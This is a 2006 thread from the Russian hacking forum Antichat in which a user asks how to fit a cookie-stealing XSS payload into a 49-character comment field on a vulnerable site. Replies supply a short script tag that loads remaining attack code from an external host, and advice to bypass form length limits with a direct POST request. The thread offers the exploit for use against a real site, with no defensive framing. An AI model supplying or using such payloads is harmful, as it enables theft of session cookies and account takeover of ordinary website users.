Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
49 символов для Xss атаки |
19.11.2006, 23:00
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
49 символов для Xss атаки
Есть уязвимость на сайте: в форме комментариев можно вписать html теги. Как можно сформировать такой JavaScript, шоб своровать куки для формы в 49 символов (обрезаеться базой)?
Последний раз редактировалось cop; 19.11.2006 в 23:07..
|
|
|
19.11.2006, 23:06
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
http://forum.antichat.ru/thread25933.html
|
|
|
|
19.11.2006, 23:11
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
Green_Bear, да, это все понятно. У меня для формы доступно только 49 символов, я не могу ничего придумать, шоб как-нить сформировать рабочий код. (я в первом сообщении исправил про 49 символов)
|
|
|
|
19.11.2006, 23:13
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
<script src='http://site.ru/a.js'></script>
А в site.ru/a.js написать остальной код
|
|
|
|
19.11.2006, 23:55
|
|
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315
Репутация:
1228
|
|
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли POST запрос, в самао скрипте редко длинна проверяеться!
а ваше смотри что те _Great_ написал!  |
|
|
|
20.11.2006, 00:04
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли Post запрос, в самао скрипте редко длинна проверяеться!
он же написал - базой.. а это хреново. Но моим способом уложиться можно
|
|
|
|
20.11.2006, 00:19
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
супер, ребята спасибо!!!!
|
|
|
|
20.11.2006, 00:20
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
не допер шото сам  |
|
|
|
20.11.2006, 17:17
|
|
Познающий
Регистрация: 06.04.2005
Сообщений: 53
Провел на форуме:
72540
Репутация:
19
|
|
_Great_
а у мня вопрос а если перед вставкой в бд например он проверяет кол-во символов поступающих получиться что он еще и посчитает все символы и с файла который вставляем ведь!Верно?
|
|
|
|
20.11.2006, 17:20
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
ну ты гонишь. ничего там не будет считать с файла.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
